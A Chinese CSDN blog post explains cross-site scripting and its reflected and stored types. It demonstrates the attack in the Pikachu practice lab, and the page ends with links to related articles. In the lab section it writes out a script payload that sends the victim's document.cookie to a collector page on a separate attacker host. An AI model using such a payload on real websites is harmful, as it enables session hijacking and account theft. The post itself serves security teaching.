XSS(跨站脚本攻击)

最新推荐文章于 2024-09-07 21:56:31 发布
最新推荐文章于 2024-09-07 21:56:31 发布
阅读量63 收藏
点赞数 1
文章标签: xss 前端 网络安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63095349/article/details/133180754
版权

1.原理

        跨站脚本攻击XSS(Cross Site Scripting)是指攻击者使用JavaScript语句向web页面插入恶意代码,用户访问该页面时,恶意代码执行从而窃取用户信息的攻击方式。

2.危害

针对用户针对web服务
窃取cookie劫持后台
网络钓鱼内网扫描
放马挖矿篡改页面
广告传播蠕虫

3.类型

  • 反射型XSS

        将恶意脚本附加到URL地址参数中或查询框里,可将URL链接发给受害者,受害者点击访问即触发,只执行一次,交互数据不会存储到数据库里。

image-20230921122023137

image-20230921122140053

  • 存储型XSS

        交互数据会被存储到服务器里永久储存,一般出现在评论区或留言板,具有持久危害。

image-20230921152437267

每次访问该页面时都会执行。

image-20230921152607437

4.利用

        在查询框里放入js语句,获取用户cookies传入后台(这里的用户是192.168.248.1,后台为192.168.57.1)

<script>document.location="http://192.168.57.1/pikachu/pkxss/xcookie/cookie.php?cookie="+document.cookie;</script>

image-20230922181335535

image-20230922181354948

 在后台中可以看到来自用户的信息

image-20230922181237498

文章部分转载自 https://blog.csdn.net/qq_44857938/article/details/118034947

KID.Sink
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS跨站脚本攻击
m0_74120514的博客
07-19 1047
安全漏洞,它允许攻击者在目标网站上注入恶意的客户端脚本。这些脚本通常以JavaScript编写,执行在用户的浏览器上,从而窃取用户信息、劫持用户会话或者重定向到恶意网站。就是。
XSS 跨站脚本攻击
猫老板的豆
06-04 664
简介 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。 攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。 XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。 而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求。 在处理输入时,以
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 3256
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
XSS跨站脚本攻击
weixin_44940180的博客
04-23 409
XSS漏洞 以下大部分内容来源于这里 XSS漏洞发生在服务器,被攻击者主动触发 攻击者将恶意代码注入到服务器中 用户在没有防备的情况下访问服务器 服务器将含有恶意代码的网页响应给客户端 在客户端浏览器中触发恶意JS代码 PoC(Proof of Concept):验证和检测漏洞的存在的代码 EXP:漏洞的完整利用工具(EXP包含PoC,shellcode和payload) shellcode:利...
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
xss.haozi.me
m0_52484587的博客
09-03 904
函数内部定义了一个正则表达式 `stripBracketsRe`,它匹配所有的圆括号字符。然后使用 `String.prototype.replace` 方法和这个正则表达式来替换字符串中的所有圆括号为空字符串(即删除它们)。它接受一个字符串 `input` 作为参数,并返回一个新的字符串,其中所有圆括号 `(` 和 `)` 都被移除了。1. 限定开头: 比如, /^A/会匹配"An e"中的A,但是不会匹配"ab A"中的A。所以,总的来说,[^>]+ 匹配了除了^的任意字符的一次或者多次。
网络安全】如何预防xss
徐徐徐的博客
09-03 1277
责任:XSS防范需要前端后端共同参与;转义规则:需要根据业务场景选择;避免拼接HTML、避免使用内联事件。
XSS和sql注入部分场景测试用例样例
m0_37570494的博客
09-07 267
XSS 攻击通常是通过输入字段插入恶意的 JavaScript 代码,试图执行客户端脚本。设计这些测试用例时,需要涵盖常见的 XSS 攻击手段。SQL 注入攻击通常通过在输入字段中插入恶意 SQL 代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的 SQL 注入技术。
网络安全XSS(新)+Amazon账户劫持复现
等风来
09-04 343
在平台创建订单后,用户可以通过平台的客服部分发送订单信息,与客服人员进行沟通,或者提交反馈或问题,订单信息为链接形式
网络安全】Exif 数据储存型XSS
最新发布
等风来
09-07 113
EXIF(Exchangeable Image File Format)数据是一种存储在图像文件中的元数据格式,常用于数码照片和扫描图像。它包含了与图像相关的各种信息,比如拍摄日期和时间、相机品牌和型号、拍摄时的设置(如曝光时间、光圈、ISO等)、地理位置(如果启用了GPS功能)等。
通过组合Self-XSS + CSRF得到存储型XSS
2301_80127209的博客
09-05 657
在一次漏洞赏金挖掘中,我在更改用户名的功能点出发现了一个XSS,在修改用户名的地方添加了一个简单的XSS payload并且刷新页面
经验笔记:跨站脚本攻击(Cross-Site Scripting,简称XSS
qq_45831414的博客
09-05 956
当其他用户浏览该页面时,嵌入的脚本就会被执行,从而可能对用户的数据安全构成威胁。:攻击者构造一个包含恶意脚本的URL,当用户点击这个链接时,恶意脚本会作为查询字符串的一部分发送到Web应用,如果Web应用没有正确处理这个输入,则会将其反射回响应中并在用户的浏览器中执行。:利用现代浏览器的安全功能,如沙箱(Sandbox)模式,它可以限制iframe内的脚本执行能力,从而减少XSS攻击的影响。:对用户的编辑和发布权限进行严格控制,特别是那些能够影响到其他人看到的内容的用户。
网络安全】Self XSS + 文件上传CSRF
等风来
09-03 396
利用Burp Suite对请求进行了深入分析,发现文件上传操作会通过 `filename` 变量来传递上传文件的名称。我尝试在文件名中输入随机文本,试图找到反射点,但最初并没有任何效果。后来,我修改了文件的扩展名为“helloworld.fakeext”,成功触发了一个错误消息
网络安全】Bingbot索引投毒实现储存型XSS
等风来
09-02 480
Bing是由微软开发的搜索引擎,提供网页、视频、图片和地图等多种搜索功能。其目标是通过呈现有条理且相关的搜索结果,帮助用户做出更明智的决策。Bingbot 是微软开发的网络爬虫,也被称为蜘蛛或搜索引擎机器人,主要用于探索和索引 Bing 搜索引擎的网页。自 2010 年 10 月推出以来,Bingbot 通过外部和内部链接发现新网页,并更新已存在的网页索引。这一过程称为“抓取”,它确保 Bing 的搜索结果始终保持最新和相关。
理解XSS跨站脚本攻击:原理、危害与防御
XSS跨站脚本攻击 XSS跨站脚本攻击是Web应用程序中常见的安全漏洞,其名称源于为了避免与CSS(层叠样式表)混淆而得名。这种攻击方式允许恶意攻击者通过在网站上注入代码,利用网站对用户输入数据的信任,对其他用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值